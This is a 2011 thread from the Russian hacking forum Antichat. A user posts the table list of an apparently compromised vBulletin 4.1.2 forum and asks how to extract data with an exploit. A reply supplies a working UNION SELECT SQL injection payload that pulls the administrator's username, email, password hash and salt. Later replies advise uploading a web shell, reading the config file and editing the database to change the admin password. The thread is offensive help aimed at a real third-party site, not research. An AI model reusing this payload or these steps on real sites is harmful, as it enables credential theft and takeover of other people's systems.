HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.06.2011, 03:16
WTSBugzoff
Познающий
Регистрация: 23.06.2011
Сообщений: 57
С нами: 7836086

Репутация: 0
По умолчанию

CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, INNODB_BUFFER_POOL_CONTENT, INDEX_STATISTICS, KEY_COLUMN_USAGE, PROCESSLIST, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TABLE_STATISTICS, TRIGGERS, USER_PRIVILEGES, USER_STATISTICS, VIEWS, INNODB_IO_PATTERN, fm_access, fm_action, fm_ad, fm_adcriteria, fm_adminhelp, fm_administrator, fm_adminlog, fm_adminmessage, fm_adminutil, fm_album, fm_albumupdate, fm_announcement, fm_announcementread, fm_attachment, fm_attachmentcategory, fm_attachmentcategoryuser, fm_attachmentpermission, fm_attachmenttype, fm_attachmentviews, fm_avatar, fm_bbcode, fm_bbcode_video, fm_block, fm_blockconfig, fm_blocktype, fm_bookmarksite, fm_cache, fm_cacheevent, fm_calendar, fm_calendarcustomfield, fm_calendarmoderator, fm_calendarpermission, fm_contentpriority, fm_contenttype, fm_cpsession, fm_cron, fm_cronlog, fm_customavatar, fm_customprofilepic, fm_datastore, fm_deletionlog, fm_discussion, fm_discussionread, fm_editlog, fm_event, fm_externalcache, fm_faq, fm_filedata, fm_forum, fm_forumpermission, fm_forumprefixset, fm_forumread, fm_groupmessage, fm_groupmessage_hash, fm_groupread, fm_holiday, fm_humanverify, fm_hvanswer, fm_hvquestion, fm_icon, fm_imagecategory, fm_imagecategorypermission, fm_indexqueue, fm_infraction, fm_infractionban, fm_infractiongroup, fm_infractionlevel, fm_language, fm_mailqueue, fm_moderation, fm_moderator, fm_moderatorlog, fm_notice, fm_noticecriteria, fm_noticedismissed, fm_package, fm_passwordhistory, fm_paymentapi, fm_paymentinfo, fm_paymenttransaction, fm_phrase, fm_phrasetype, fm_picturecomment, fm_picturecomment_hash, fm_picturelegacy, fm_plugin, fm_pm, fm_pmreceipt, fm_pmtext, fm_pmthrottle, fm_podcast, fm_podcastitem, fm_poll, fm_pollvote, fm_post, fm_postedithistory, fm_posthash, fm_postlog, fm_postparsed, fm_prefix, fm_prefixpermission, fm_prefixset, fm_product, fm_productcode, fm_productdependency, fm_profileblockprivacy, fm_profilefield, fm_profilefieldcategory, fm_profilevisitor, fm_ranks, fm_reminder, fm_reputation, fm_reputationlevel, fm_route, fm_rssfeed, fm_rsslog, fm_searchcore, fm_searchcore_text, fm_searchgroup, fm_searchgroup_text, fm_searchlog, fm_session, fm_setting, fm_settinggroup, fm_sigparsed, fm_sigpic, fm_smilie, fm_socialgroup, fm_socialgroupcategory, fm_socialgroupicon, fm_socialgroupmember, fm_spamlog, fm_stats, fm_strikes, fm_style, fm_stylevar, fm_stylevardfn, fm_subscribediscussion, fm_subscribeevent, fm_subscribeforum, fm_subscribegroup, fm_subscribethread, fm_subscription, fm_subscriptionlog, fm_subscriptionpermission, fm_tachyforumcounter, fm_tachyforumpost, fm_tachythreadcounter, fm_tachythreadpost, fm_tag, fm_tagcontent, fm_tagsearch, fm_template, fm_templatehistory, fm_templatemerge, fm_thread, fm_threadrate, fm_threadread, fm_threadredirect, fm_threadviews, fm_upgradelog, fm_user, fm_useractivation, fm_userban, fm_userchangelog, fm_usercss, fm_usercsscache, fm_userfield, fm_usergroup, fm_usergroupleader, fm_usergrouprequest, fm_userlist, fm_usernote, fm_userpromotion, fm_usertextfield, fm_usertitle, fm_visitormessage, fm_visitormessage_hash

С такой схемкой какой запрос в 4.1.2 vbulletin в эксплойте лучше делать запрос, дабы получить данные? Многое пробывал, всюду database error
 
Ответить с цитированием

  #2  
Старый 24.06.2011, 10:41
абвгдешка
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами: 7910966

Репутация: 1
По умолчанию

в твоём случае так

Цитата:
Сообщение от None  
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM
fm_user
WHERE userid=1#
 
Ответить с цитированием

  #3  
Старый 24.06.2011, 17:52
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
С нами: 8547867

Репутация: 0
По умолчанию

Как сделать запрос UPDATE? В таблице юзер надо сменить пас админу.
 
Ответить с цитированием

  #4  
Старый 25.06.2011, 20:00
абвгдешка
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами: 7910966

Репутация: 1
По умолчанию

Цитата:
Сообщение от Export  
Как сделать запрос UPDATE? В таблице юзер надо сменить пас админу.
обычно права есть только на чтение,на запись бывают очень редко...
 
Ответить с цитированием

  #5  
Старый 26.06.2011, 00:55
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
С нами: 8547867

Репутация: 0
По умолчанию

А Если есть доступ к админу?(К другому)
 
Ответить с цитированием

  #6  
Старый 26.06.2011, 12:47
абвгдешка
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами: 7910966

Репутация: 1
По умолчанию

заливай шелл,смотри конфиг подключайся к бд меняй всё что хочешь
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...